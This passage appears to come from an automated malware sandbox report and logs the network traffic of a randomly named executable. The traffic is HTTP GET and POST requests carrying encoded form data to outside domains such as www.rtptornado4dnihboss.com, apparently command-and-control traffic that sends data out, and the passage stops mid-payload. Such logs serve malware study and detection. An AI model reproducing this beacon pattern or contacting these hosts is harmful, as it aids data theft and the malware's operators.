                                                                                                                              Dec 4, 2023 15:23:59.616556883 CET5198OUTData Raw: 48 30 57 54 69 4b 75 68 67 2b 56 63 68 75 56 2b 4a 64 4a 78 51 30 37 2b 31 4d 72 47 61 62 59 4d 5a 42 6e 75 2f 68 65 56 33 78 73 4b 56 4d 41 32 52 61 41 69 73 66 4c 43 4a 33 46 36 47 6f 41 6b 49 56 38 38 4e 58 47 4b 34 34 54 4a 64 6a 49 61 37 58
                                                                                                                              Data Ascii: H0WTiKuhg+VchuV+JdJxQ07+1MrGabYMZBnu/heV3xsKVMA2RaAisfLCJ3F6GoAkIV88NXGK44TJdjIa7XdJciiBedMscmNAWDBiZ7daDGT/phThk5SHTT4h6+Uo1A/QQkep2Gzg8QHJ3+RkqAD1MuDyRuDj86aiZvbTk4Fu4uAa1jIwnqUNxSRYz261AornCa3HvZVd1p5giz9W1WWyQKMqsUc7uZz76PFTJImcu58qHZzI71+
                                                                                                                              Dec 4, 2023 15:23:59.616974115 CET2626OUTData Raw: 67 6c 62 55 4c 54 76 69 53 71 38 4b 32 2b 30 48 39 61 6a 2b 64 65 38 51 72 78 6a 41 57 58 52 42 6a 6f 78 50 6d 6f 4d 76 43 64 70 41 56 42 45 56 46 44 70 6a 55 48 43 77 39 41 52 53 45 30 6b 36 45 67 6d 4c 36 70 62 65 46 2f 4e 76 4a 67 4d 57 63 6c
                                                                                                                              Data Ascii: glbULTviSq8K2+0H9aj+de8QrxjAWXRBjoxPmoMvCdpAVBEVFDpjUHCw9ARSE0k6EgmL6pbeF/NvJgMWclfj52yT1IoD8WSm777rvMjAXUfjLrFF2Cak+NDTZDdbD2zj5Ismy+n7O776cNXolBPQBfMK++mrphN3yGvNPUFOAR5oE9I4ZaFsKR7TuJfXYRdHyKbITQtEe7DxbycChQqYlEPaKyB39BM1A6msGBLWaniCHWbCvXU
                                                                                                                              Dec 4, 2023 15:23:59.942840099 CET587INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:59 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.11.2050151198.177.123.106808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:01.968038082 CET536OUTGET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:02.296098948 CET602INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:02 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.11.2050152198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:07.593822956 CET834OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 34 45 70 2b 62 66 5a 64 6f 57 58 37 55 71 6f 2b 6a 4f 38 4d 44 34 73 64 55 50 61 62 58 33 54 37 6c 6b 6c 38 49 68 54 70 4b 38 75 6f 56 39 32 4b 4f 4c 48 57 73 55 2f 79 71 49 44 50 52 73 75 4e 54 43 76 63 76 32 54 37 57 44 75 52 2f 52 2f 54 67 50 52 52 4c 79 4b 43 55 62 39 35 62 6d 4d 48 67 7a 41 58 6a 6b 69 35 43 75 73 48 73 66 70 31 7a 52 58 57 58 72 66 54 42 49 66 31 2f 45 72 48 49 6e 73 7a 78 52 33 44 67 4d 2f 4d 4b 55 41 38 72 64 72 56 53 34 78 43 78 55 75 46 50 68 74 59 6a 62 4e 52 69 42 50 51 71 38 63 43 48 4f 4f 42 77 51 3d 3d
                                                                                                                              Data Ascii: TZd=4Ep+bfZdoWX7Uqo+jO8MD4sdUPabX3T7lkl8IhTpK8uoV92KOLHWsU/yqIDPRsuNTCvcv2T7WDuR/R/TgPRRLyKCUb95bmMHgzAXjki5CusHsfp1zRXWXrfTBIf1/ErHInszxR3DgM/MKUA8rdrVS4xCxUuFPhtYjbNRiBPQq8cCHOOBwQ==
                                                                                                                              Dec 4, 2023 15:24:07.760459900 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:07 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.11.2050153198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:10.287143946 CET1174OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 34 45 70 2b 62 66 5a 64 6f 57 58 37 55 4f 55 2b 6b 74 55 4d 4b 34 73 61 49 2f 61 62 65 58 53 79 6c 6b 35 38 49 6a 2b 79 4b 71 47 6f 56 63 71 4b 4e 4b 48 57 76 55 2f 79 34 6f 44 4b 62 4d 75 43 54 43 79 38 76 33 66 37 57 44 36 52 74 77 66 54 33 50 52 57 42 53 4b 46 63 37 39 43 4e 57 4d 5a 67 7a 4d 68 6a 6d 65 35 42 65 41 48 74 63 42 31 33 46 44 56 51 4c 66 52 57 59 66 32 32 6b 72 42 49 6e 67 52 78 52 50 31 67 39 4c 4d 4a 77 30 38 71 64 72 53 59 49 78 46 34 30 76 55 43 44 45 58 6b 74 35 63 34 44 50 2b 67 2f 39 4e 46 66 50 4c 72 37 62 56 4c 4e 4a 7a 53 42 49 6c 4c 6c 48 6a 6b 63 78 65 31 6a 61 45 50 47 66 4d 5a 48 57 35 56 64 72 65 76 4d 51 69 71 50 72 53 77 5a 70 72 2b 6c 4f 37 75 4c 36 78 31 65 47 50 37 71 45 65 53 74 74 70 78 32 71 6f 48 6f 4e 37 6f 72 2b 52 76 51 34 63 4e 61 6f 77 6b 6d 38 68 41 78 58 55 72 62 4d 6e 57 65 58 6d 6d 61 4f 76 4d 73 5a 55 53 38 56 44 61 72 55 50 70 6d 74 6d 39 4d 4e 45 4b 43 4a 4f 42 39 4c 44 6e 36 32 65 35 6e 37 43 30 57 74 48 66 44 33 36 4f 4b 30 6e 42 50 58 41 38 54 67 52 30 69 45 51 64 38 69 52 61 51 4a 76 45 4b 34 57 64 45 43 72 4f 5a 78 6d 6b 73 4a 46 63 43 53 62 6e 78 47 56 4e 50 47 68 59 5a 6d 59 6e 61 47 39 56 63 74 6f 47 2f 68 46 56 51 73 6f 45 41 4a 66 67 38 52 7a 4c 51 71 55 4f 61 32 77 36 2f 37 55 65 72 50 6e 37 6d 37 72 36 79 68 6d 6d 52 64 59 31 64 34 6e 31 74 6b 73 43 42 2b 39 70 4b 76 43 44 49 56 77 50 70 4e 59 4a 42 72 79 48 74 61 68 69 77 7a 6b 69 6d 71 61 7a 4a 6b 64 44 64 39 63 61 50 6d 31 72 4a 32 76 43 31 57 4d 2b 35 41 4c 61 62 39 4a 54 31 57 30 48 53 52 66 6f 33 72 32 55 4e 73 3d
                                                                                                                              Data Ascii: TZd=4Ep+bfZdoWX7UOU+ktUMK4saI/abeXSylk58Ij+yKqGoVcqKNKHWvU/y4oDKbMuCTCy8v3f7WD6RtwfT3PRWBSKFc79CNWMZgzMhjme5BeAHtcB13FDVQLfRWYf22krBIngRxRP1g9LMJw08qdrSYIxF40vUCDEXkt5c4DP+g/9NFfPLr7bVLNJzSBIlLlHjkcxe1jaEPGfMZHW5VdrevMQiqPrSwZpr+lO7uL6x1eGP7qEeSttpx2qoHoN7or+RvQ4cNaowkm8hAxXUrbMnWeXmmaOvMsZUS8VDarUPpmtm9MNEKCJOB9LDn62e5n7C0WtHfD36OK0nBPXA8TgR0iEQd8iRaQJvEK4WdECrOZxmksJFcCSbnxGVNPGhYZmYnaG9VctoG/hFVQsoEAJfg8RzLQqUOa2w6/7UerPn7m7r6yhmmRdY1d4n1tksCB+9pKvCDIVwPpNYJBryHtahiwzkimqazJkdDd9caPm1rJ2vC1WM+5ALab9JT1W0HSRfo3r2UNs=
                                                                                                                              Dec 4, 2023 15:24:10.453571081 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:10 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.11.2050154198.252.98.64808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:12.975311995 CET12914OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 34 45 70 2b 62 66 5a 64 6f 57 58 37 55 4f 55 2b 6b 74 55 4d 4b 34 73 61 49 2f 61 62 65 58 53 79 6c 6b 35 38 49 6a 2b 79 4b 71 4f 6f 55 75 69 4b 50 70 66 57 75 55 2f 79 37 6f 44 4c 62 4d 75 6c 54 43 36 6a 76 33 6a 72 57 41 43 52 74 44 6e 54 33 62 78 57 45 53 4b 45 42 4c 39 36 62 6d 4e 65 67 7a 42 69 6a 6d 4b 50 43 75 45 48 73 66 5a 31 7a 33 72 57 65 37 66 54 57 59 66 36 37 45 71 2b 49 6e 56 55 78 52 54 31 67 34 44 4d 4c 43 38 38 6f 4b 66 53 56 34 78 47 33 55 75 61 49 6a 45 79 6b 73 5a 69 34 44 50 75 67 2b 70 4e 46 66 76 4c 71 34 7a 57 49 74 4a 7a 64 52 49 6b 61 31 4c 2f 6b 59 52 47 31 6a 47 45 50 46 66 4d 66 6e 57 35 52 4d 72 66 70 73 52 72 75 50 71 51 36 35 31 7a 2b 6c 71 76 75 4b 75 78 31 4f 43 50 36 5a 73 65 51 50 46 70 79 57 71 75 44 6f 4e 53 68 4c 2b 6b 76 51 70 39 4e 65 59 67 6b 68 45 68 41 54 66 55 68 61 4d 6d 47 75 58 73 37 71 4f 2b 61 63 56 69 53 38 46 66 61 72 56 4b 70 6e 5a 6d 39 38 39 45 4c 44 4a 4a 48 74 4c 45 68 36 33 45 33 48 6e 79 30 58 46 50 66 41 33 71 4f 4a 59 6e 54 2f 58 41 36 30 4d 53 2b 53 45 58 55 63 6a 4f 48 67 4a 30 45 4b 38 67 64 41 79 52 4e 6f 4a 6d 6b 63 5a 46 62 53 53 59 78 42 47 5a 59 2f 47 6a 4a 4a 6d 59 6e 61 61 50 56 63 68 6f 47 4f 70 46 55 69 30 6f 41 54 68 66 74 63 52 70 4c 51 71 2f 4f 62 4c 4f 36 38 62 36 65 71 2f 64 37 67 4c 72 36 47 74 6d 6e 6b 70 58 7a 74 34 69 78 74 6b 33 47 42 43 75 70 4b 7a 61 44 49 6b 4c 50 5a 68 59 49 42 37 79 4d 4e 62 33 6e 51 7a 6a 71 47 71 79 33 4a 5a 43 44 5a 64 71 61 50 69 66 72 4f 71 76 41 78 2f 58 6b 39 55 70 44 4e 64 41 55 68 47 59 49 51 73 54 30 31 54 6d 50 70 6a 31 73 51 63 78 76 2b 33 56 7a 47 42 47 38 42 6f 44 56 50 65 66 5a 4b 32 77 6e 62 52 39 61 6e 56 4a 72 70 65 4b 66 45 53 2b 59 59 34 64 4a 61 46 73 69 74 50 61 2f 49 67 4f 67 63 62 64 68 6f 38 6d 53 6c 74 47 4a 2f 51 31 6b 61 46 64 50 66 58 79 31 75 63 57 71 7a 79 73 76 6b 76 2f 4a 55 51 55 47 55 45 42 65 63 74 6f 36 77 65 55 64 57 70 73 6a 67 34 79 39 65 49 42 65 56 43 6b 46 59 49 51 53 32 36 43 4f 76 34 37 61 75 47 4b 33 71 50 30 4e 37 62 43 2b 41 4c 7a 34 58 38 74 47 53 39 42 6f 2f 43 39 39 70 6e 39 63 37 5a 62 4a 33 6e 6e 57 55 74 7a 71 49 4e 44 52 56 47 33 58 64 75 72 76 66 49 4d 42 79 71 64 66 30 78 4e 63 67 76 39 69 52 2b 51 46 55 70 37 6b 31 58 4d 4e 4b 50 64 66 66 43 6d 6c 45 52 5a 50 4e 51 54 35 67 57 4d 44 58 32 55 64 35 54 59 4a 50 35 70 46 51 2b 6e 71 37 50 67 6d 42 4f 52 51 2b 32 52 66 58 75 54 6f 6e 67 52 61 4a 4a 6f 69 56 70 47 63 35 6a 49 2f 33 67 59 70 39 41 79 5a 78 63 63 39 6a 54 30 46 4c 42 70 61 52 6a 61 63 56 4d 6d 2b 2f 30 67 38 75 6a 76 63 47 6c 73 49 46 63 73 2f 56 6f 7a 39 68 70 6d 4b 35 6f 6b 70 2f 62 71 73 64 65 58 31 7a 71 62 33 64 49 5a 37 46 4d 5a 48 45 4b 6b 33 6d 47 55 33 62 6a 71 35 4c 4f 6a 38 72 30 77 7a 38 31 44 38 2f 4e 76 50 6e 73 51 55 37 35 73 66 73 37 55 56 43 35 56 50 6d 71 4f 53 49 63 56 4c 6f 6c 73 55 51 4a 76 38 54 67 37 55 4d 50 45 39 66 66 6b 52 77 44 38 4d 4b 4a 52 71 6c 44 4a 50 53 57 41 35 39 44 43 42 46 6e 4b 75 38 38 79 34 62 6f 71 6e 41 79 56 41 41 42 41 2b 74 59 50 65 35 78 32 5a 6a 65 68 49 63 64 32 67 4c 45 65 63 4c 30 49 2b 64 64 69 48 6c 72 78 76 77 46 77 55 33 36 71 43 47 50 44 57 51 6c 63 2f 36 48 6c 47 76 39 49 44 6a 66 61 37 6f 37 51 6d 43 78 57 75 6e 4f 6a 36 57 32 33 75 70 48 54 69 78 31 66 4b 71 56 33 58 46 